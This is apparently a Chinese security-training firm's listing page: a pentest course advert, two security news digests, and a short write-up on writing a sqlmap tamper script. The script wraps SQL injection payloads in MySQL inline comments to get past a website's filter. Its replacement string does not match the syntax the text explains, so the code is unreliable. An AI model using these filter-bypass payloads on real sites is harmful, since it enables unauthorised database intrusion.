为深入贯彻落实我国“十四五”规划和2035年远景目标纲要对网络安全工作的重要部署,把握当前国际国内、教育系统网络安全工作面临的新形势,加强网络安全宣传教育和人才培养,赋能高校打造经验丰富的网安教学师资队伍,全面提升网络安全技能的实战教学水平。针对渗透测试实战攻防技术等网安教学热点需求,特举办此次“2024年网络安全高级研修班”。 一、组织单位 指导单位:中国网络空间安全人才教育论坛 主办单位:湖南蚁景科技有限公司      成都为辰信息科技有限公司      电子科技大学嵌入式软件工程中心 二、培训内容 1、渗透测试基础与环境搭建 学习渗透测试的基本流程和原理,包括渗透测试的各个阶段:信息收集、漏洞分析、利用攻击、后期利用和报告撰写。安装和配置渗透测试所需的工具和环境,为实际操作打下基础。 2、渗透测试执行与战术框架 掌握渗透测试的执行标准,了解如何按照既定的方法和流程进行测试。学习MITRE ATT&CK框架,一个用于描述网络攻击生命周期的模型,帮助理解攻击者可能采取的策略和战术。 3、渗透测试技术深入与场景应用 深入学习渗透测试中的各种技术,包括外网信息收集、漏洞扫描、攻击利用、命令控制、内网穿透和权限提升。通过搭建不同的渗透测试场景,实践和应用所学技术,增强实战能力。 4、渗透测试攻击技术与防守技术总结 分析红队(攻击方)和蓝队(防守方)的攻击与防守技术,了解双方的策略和方法。学习如何总结攻击事件,包括应急响应流程和入侵溯源排查,提高对安全事件的响应能力。 5、渗透测试实战与案例分析 通过实际案例分析,加深对渗透测试技术的理解,学习如何将理论知识应用到实际场景中。强化对渗透测试流程的掌握,提高解决实际安全问题的能力。 三、培训对象 全国高校、职业院校计算机相关专业(信息安全、计算机科学与技术、网络安全、信息科学与工程、软件工程、网络工程等)专业负责人、学科带头人、专业骨干教师、实验室人员等。 四、预期收获 1、理论知识:对渗透测试的整个流程和相关概念有深入的理解。 2、技术技能:掌握一系列渗透测试工具的使用方法和技巧,能够独立进行系统的渗透测试。 3、实战经验:通过模拟场景和案例分析,获得宝贵的实战经验,提高解决实际安全问题的能力。 4、安全意识:增强对网络安全威胁的认识,理解攻击者的思维和行为模式。 5、应急响应:学习如何对安全事件进行快速响应和有效处理,包括入侵检测和事后溯源。 6、个人发展:为从事网络安全相关工作打下坚实基础,提升个人在信息安全领域的竞争力。 7、结业证书:获得由蚁景科技、为辰信安和电子科技大学嵌入式软件工程中心联合签章颁发的结业证书。 五、培训安排 1、培训方式:线下培训 + 线上直播 2、培训时间:2024年7月29日-8月2日(7月28日报到) 3、培训地点:成都市月牙濠璟酒店 4、会议规模:100人 六、报名方式 1、报名时间:即日起至2024年7月28日 2、报名邮箱:EDU@antvsion.com 3、电话咨询:黄老师 18774948349 4、培训费用:3680元/人(含培训资料,路费和食宿费用自理,自备电脑) 5、付款方式:      ◆ 线上汇款: (请务必在备注栏里注明“学校名+参会者姓名”)         公司名称:湖南蚁景科技有限公司         开户行名称:建设银行长沙金星支行         开户行账号:4305 0178 4836 0000 0935      ◆ 现场缴费:现金、扫码或刷卡(银行卡、公务卡均可)  具体课程内容 扫描下方二维码即可报名:
网络安全日报 2024年05月21日
1、Grandoreiro银行木马针对1500多家银行发起攻击 https://securityintelligence.com/x-force/grandoreiro-banking-trojan-unleashed/ 自2024年3月执法部门于1月取缔以来,基于Windows的Grandoreiro银行木马背后的威胁行为者又在全球范围内卷土重来。这些大规模网络钓鱼攻击很可能是由其他网络犯罪分子通过恶意软件即服务(MaaS)模式发起的,针对全球1500多家银行,涵盖中南美洲、非洲、欧洲和中东地区的60多个国家。这些攻击从网络钓鱼电子邮件开始,指示收件人点击链接查看发票或付款,具体取决于诱饵的性质和消息中冒充的政府实体。 2、美国无线电中继联盟遭遇网络攻击导致其IT系统和在线运营中断 https://www.bleepingcomputer.com/news/security/arrl-cyberattack-takes-logbook-of-the-world-offline/ 美国无线电中继联盟(ARRL)警告称,它遭受了网络攻击,导致其IT系统和在线运营中断,包括电子邮件和Logbook of The World。ARRL是美国业余无线电的全国协会,代表业余无线电利益向政府监管机构进行申诉,提供技术建议,并为全国各地的爱好者推广活动和教育计划。周四,ARRL宣布遭受网络攻击,导致其网络和系统中断,包括该组织托管的各种在线服务。ARRL在一份新闻稿中解释说:“我们正在 3、谷歌修复了一个被利用的Chrome零日漏洞CVE-2024-4947 https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html 谷歌已经推出了修复程序,以解决其Chrome浏览器中的九个安全问题,其中包括一个已被广泛利用的新的零日漏洞。该漏洞的CVE标识符为CVE-2024-4947,与V8 JavaScript和WebAssembly引擎中的类型混淆错误有关。当程序尝试访问类型不兼容的资源时,就会出现类型混淆漏洞。它可能会产生严重影响,因为该漏洞允许威胁参与者执行越界内存访问、导致崩溃并执行任意代码。此次修复是继CVE-2024-4671和C 4、Kimsuky针对韩国发起网络攻击并部署Linux后门Gomir https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/springtail-kimsuky-backdoor-espionage Kimsuky(又名Springtail)高级持续威胁(APT)组织部署了Linux版本的GoBear后门以发起网络攻击活动。GoBear于2024年2月上旬首次被韩国安全公司记录,该活动与传播名为Troll Stealer(又名TrollAgent)的恶意软件的活动有关,该恶意软件与AppleSeed和AlphaSeed等已知的Kimsuky恶意软件系列重叠。该恶意软件是 5、英特尔披露其人工智能模型压缩软件中的严重漏洞 https://www.anquanke.com/post/id/296632 英特尔披露了其用于人工智能模型压缩的英特尔神经压缩软件的某些版本中存在一个最严重的漏洞。该漏洞编号为CVE-2024-22476,为未经身份验证的攻击者提供了一种在运行受影响软件版本的英特尔系统上执行任意代码的方法。该漏洞是该公司本周在41 个安全公告中披露的数十个缺陷中最严重的一个。 6、挪威国家网络安全中心建议放弃 SSLVPN 和 WebVPN https://www.anquanke.com/post/id/296604 挪威国家网络安全中心 (NCSC) 发布了一项建议,建议各组织使用更安全的替代方案替换 SSLVPN 和 WebVPN 解决方案,因为过去多次利用边缘网络设备中的漏洞,导致攻击者能够破坏企业网络。 7、联合国举办首届全球网络安全能力建设高级别圆桌会议 https://www.secrss.com/articles/66152 联合国在信息和通信技术安全与使用问题不限成员名额工作组(OEWG)的主持下,举办了首届全球网络安全能力建设高级别圆桌会议,该会议旨在弥补全球在信息和通信技术安全方面的能力差距。 8、严重的Git漏洞允许在克隆包含子模块的存储库时进行RCE https://www.helpnetsecurity.com/2024/05/16/git-cve-2024-32002/ CVE-2024-32004 还允许远程代码执行,但仅限于多用户计算机:“攻击者可以准备一个本地存储库,使其看起来像缺少对象的部分克隆,这样,当克隆此存储库时,Git 将在操作期间执行任意代码,并具有执行克隆的用户的完全权限。 9、网络攻击导致佳士得 8.4 亿美元艺术品拍卖会中断 https://www.infosecurity-magazine.com/news/cyber-attack-disrupts-christies/ 网络攻击导致佳士得网站下线(可能是上周),潜在买家无法在线查看拍品。这并非第一次与拍卖有关的攻击。甚至还有一类被称为'eBay 攻击'的漏洞,攻击者曾经利用五分钟的账户锁定期来阻止其他竞拍者提高他们想赢得的商品的价格。 10、福昕 PDF 阅读器漏洞被黑客利用,传播多种恶意软件 https://thehackernews.com/2024/05/foxit-pdf-reader-flaw-exploited-by.html 多个威胁参与者正在利用 Foxit PDF Reader 中的设计缺陷来传播各种恶意软件,例如 Agent Tesla、AsyncRAT、DCRat、NanoCore RAT、NjRAT、Pony、Remcos RAT 和 XWorm。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
在一次渗透中学会编写Tamper脚本
拿到这个网站,通过对比查询,我们发现 闭合参数 finsh 时,查询出的内容更多 经过进一步判断,确实存在漏洞 不过在测试的时候发现存在一定的过滤 但是可以通过内联注释进行绕过。 这里也是加深了解了内联注释的知识点,之前只会简单的利用 /*!50000UniON SeLeCt*/ /*!12345union*/不知其所以然,有这样一段解释,在 mysql 中 /*!...*/不是注释,mysql 为了保持兼容,它把一些特有的仅在 mysql 上用的语句放在 /*!...*/中,这样这些语句如果在其他数据库中是不会被执行,但是在 mysql 中它会执行。当后面接的数据库版本号小于自身版本号,就会将注释中的内容执行,当后面接的数据库版本号大于等于自身版本号,就会当做注释来处理。如下语句 /*!50001UniON SeLeCt*/ 这里的 50001 表示假如数据库的版本是 我们首先查询出数据库的版本信息 当前面的数字为 50723 及小于这个数的五位数字组合都可以利用成功 当前面的数字为 50724 及大于这个数的五位数字组合无法利用成功 我们已经手工验证过了存在 SQL 注入漏洞,但是却无法利用 sqlmap 识别出联合注入,是因为存在检测,需要内联注释进行绕过 我们需要编写一个Tamper脚本 我们打开 sqlmap-master\tamper 下的一个文件 htmlencode.py 我们看到就是一个查找替换的操作 我们目前已经知道需要利用内联注释来实现绕过检测的操作 我们修改代码 import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies():    pass def tamper(payload, **kwargs):    """   HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)   >>> tamper("1' AND SLEEP(5)#")   '1'/!*00000AND SLEEP(5)*/#'   """    if payload:        replaced_text = payload        replace_code = re.search(r"'(.*?)(#|--)", payload)        if replace_code:             replaced_text = re.sub(r"(?<=')(.*?)(?=#|--)", r"/!*00000\1*/", payload)      return replaced_text 成功生效
网络安全日报 2024年05月20日
1、Kimsuky组织利用Facebook Messenger传播恶意软件 https://www.genians.co.kr/blog/threat_intelligence/facebook 与朝鲜有联系的Kimsuky黑客组织被归因于一种新的社会工程攻击,该攻击利用虚构的Facebook帐户通过Messenger攻击目标,并最终传播恶意软件。攻击者创建了一个Facebook帐户,其身份伪装成在朝鲜人权领域工作的公职人员。声明指出,这次冒充合法个人的多阶段攻击活动旨在针对朝鲜人权和反朝领域的活动人士。该方法与典型的基于电子邮件的鱼叉式网络钓鱼策略不同,它利用社交媒体平台通过Facebook Messenger接近目标,并诱骗他们打开由该角色编写的看似私人的文档。 2、研究人员发现GE HealthCare超声机的11个安全漏洞 https://www.nozominetworks.com/blog/ge-healthcare-vivid-ultrasound-vulnerabilities 安全研究人员披露了影响GE HealthCare Vivid Ultrasound产品系列的近十几个安全漏洞,恶意行为者可能会利用这些漏洞篡改患者数据,甚至在某些情况下安装勒索软件。这些缺陷造成的影响是多方面的:从在超声波机器上植入勒索软件,到访问和操纵易受攻击的设备上存储的患者数据。这些安全问题影响Vivid T9超声系统及其预装的Common Service Desktop Web应用程序,该应用程序暴露在设备的本地主机界面 3、微软修复了NTLM身份验证失败的Windows Server错误 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-server-bug-causing-crashes-ntlm-auth-failures/ Microsoft修复了安装上个月的Windows Server安全更新后导致NTLM身份验证失败和域控制器重新启动的已知问题。根据Windows运行状况仪表板条目,此问题仅影响具有大量NTLM流量和少量主DC的组织中的Windows域控制器。在受影响的系统上,部署4月份的Windows Server安全更新后,管理员还会看到高负载,并且在极少数情况下,域控 4、MITRE推出EMB3D嵌入式设备威胁建模框架 https://www.mitre.org/news-insights/news-release/mitre-releases-emb3d-cybersecurity-threat-model-embedded-devices MITRE公司已正式为关键基础设施环境中使用的嵌入式设备制造商提供了名为EMB3D的新威胁建模框架。该非营利组织在宣布此举的帖子中表示:“该模型提供了嵌入式设备网络威胁的丰富知识库,提供了对这些威胁的共同理解以及缓解这些威胁所需的安全机制。”EMB3D与ATT&CK框架一样,预计将成为一个“活框架”,随着新参与者、漏洞和攻击媒介的出现,新的缓解措施会随着时间的推移而添 5、Phorpiex发送数百万钓鱼邮件进行LockBit 勒索活动 https://www.bleepingcomputer.com/news/security/botnet-sent-millions-of-emails-in-lockbit-black-ransomware-campaign/ 自4月份以来,已通过Phorpiex僵尸网络发送了数百万封钓鱼电子邮件,以开展大规模的LockBit Black勒索软件活动。攻击者使用包含部署LockBit Black有效负载的可执行文件的ZIP附件,该有效负载一旦启动就会对接收者的系统进行加密。这些攻击中部署的LockBit Black加密器很可能是使用一名心怀不满的开发人员于2022年9月在Twitter上 6、恶意PyPi包使用Sliver C2套件在Mac上安装后门 https://blog.phylum.io/malicious-go-binary-delivered-via-steganography-in-pypi/ 一个新包模仿了Python包索引(PyPI)上流行的“请求”库,以带有Sliver C2对抗框架的macOS设备为目标,用于获得对企业网络的初始访问权限。研究人员发现,该活动涉及多个步骤和混淆层,包括在PNG图像文件中使用隐写术在目标上秘密安装Sliver有效负载。截至撰写本文时,恶意PyPI软件包已被删除,但它的发现是Sliver越来越多地采用远程访问企业网络的另一个迹象。Sliver是一款跨平台(Windows、macOS、Lin 7、微软修复了QakBot恶意软件攻击中利用的Windows零日漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-zero-day-exploited-in-qakbot-malware-attacks/ 微软修复了一个零日漏洞,该漏洞被利用来在易受攻击的Windows系统上传播QakBot和其他恶意软件负载。此权限提升错误被追踪为CVE-2024-30051,是由DWM(桌面窗口管理器)核心库中基于堆的缓冲区溢出引起的。成功利用该漏洞后,攻击者可以获得系统权限。桌面窗口管理器是Windows Vista中引入的一项Windows服务,允许操作系统在渲染玻璃窗框 8、CISA警告D-Link路由器漏洞被积极利用应当立刻修补 https://www.cisa.gov/news-events/alerts/2024/05/16/cisa-adds-three-known-exploited-vulnerabilities-catalog 美国网络安全和基础设施安全局(CISA)周四根据活跃利用的证据,将两个影响D-Link路由器的安全漏洞添加到其已知被利用的漏洞(KEV)目录中。CVE-2014-100005:影响D-Link DIR-600路由器的跨站点请求伪造(CSRF)漏洞,允许攻击者通过劫持现有管理员会话来更改路由器配置。CVE-2021-40655:影响D-Link DIR-605路由器的信息泄露漏洞,允 9、Slack抓取客户数据用于AI 模型训练,引发用户强烈抗议 https://www.securityweek.com/user-outcry-as-slack-scrapes-customer-data-for-ai-model-training/ Slack 透露,它一直在根据客户数据(包括消息、文件和使用信息)训练 AI/ML 模型。默认情况下它是选择加入的。企业工作场所协作平台 Slack 被曝一直在抓取客户数据(包括消息和文件)以开发新的人工智能和机器学习模型,引发了隐私方面的强烈反对。 10、一名美国妇女被指控帮助朝鲜IT人员渗透数百家美国公司 https://securityaffairs.com/163349/intelligence/north-korea-linked-it-workers-infiltrated-us-firms.html 美国政府已宣布指控、扣押、逮捕和奖励,以阻止朝鲜 IT 工人渗透到数百家公司并为朝鲜赚取数百万美元的计划。美国司法部周四宣布对来自亚利桑那州的 49 岁克里斯蒂娜·玛丽·查普曼 (Christina Marie Chapman) 提出指控,指控她在 2020 年 10 月至 2023 年 10 月期间协助朝鲜 IT 工人在美国找到工作。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页